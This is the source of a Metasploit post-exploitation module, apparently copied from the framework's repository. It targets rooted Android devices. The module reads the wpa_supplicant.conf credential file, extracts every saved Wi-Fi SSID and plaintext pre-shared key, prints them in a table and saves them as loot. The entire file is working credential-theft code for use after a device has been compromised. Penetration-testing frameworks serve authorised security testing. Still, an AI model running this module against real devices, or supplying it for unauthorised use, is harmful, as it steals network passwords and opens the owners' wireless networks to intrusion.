Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  include Msf::Post::Common
9
  include Msf::Post::File
10
  include Msf::Post::Android::Priv
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        {
17
          'Name' => 'Displays wireless SSIDs and PSKs',
18
          'Description' => %q{
19
            This module displays all wireless AP creds saved on the target device.
20
          },
21
          'License' => MSF_LICENSE,
22
          'Author' => ['Auxilus', 'timwr'],
23
          'SessionTypes' => [ 'meterpreter', 'shell' ],
24
          'Platform' => 'android'
25
        }
26
      )
27
    )
28
  end
29

30
  def run
31
    unless is_root?
32
      print_error('This module requires root permissions.')
33
      return
34
    end
35

36
    data = read_file('/data/misc/wifi/wpa_supplicant.conf')
37
    aps = parse_wpa_supplicant(data)
38

39
    if aps.empty?
40
      print_error('No wireless APs found on the device')
41
      return
42
    end
43
    ap_tbl = Rex::Text::Table.new(
44
      'Header' => 'Wireless APs',
45
      'Indent' => 1,
46
      'Columns' => ['SSID', 'net_type', 'password']
47
    )
48

49
    aps.each do |ap|
50
      ap_tbl << [
51
        ap[0],  # SSID
52
        ap[1],  # TYPE
53
        ap[2]   # PASSWORD
54
      ]
55
    end
56

57
    print_line(ap_tbl.to_s)
58
    p = store_loot(
59
      'wireless.ap.creds',
60
      'text/csv',
61
      session,
62
      ap_tbl.to_csv,
63
      File.basename('wireless_ap_credentials.txt')
64
    )
65
    print_good("Secrets stored in: #{p}")
66
  end
67

68
  def parse_wpa_supplicant(data)
69
    aps = []
70
    networks = data.scan(/^network={$(.*?)^}$/m)
71
    networks.each do |block|
72
      aps << parse_network_block(block[0])
73
    end
74
    aps
75
  end
76

77
  def parse_network_block(block)
78
    ssid = parse_option(block, 'ssid')
79
    type = parse_option(block, 'key_mgmt', false)
80
    psk = parse_option(block, 'psk')
81
    [ssid, type, psk]
82
  end
83

84
  def parse_option(block, token, strip_quotes = true)
85
    if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))
86
      return result.captures[0]
87
    elsif (result = block.match(/^\s#{token}=(.+)$/))
88
      return result.captures[0]
89
    end
90
  end
91

92
end
93

94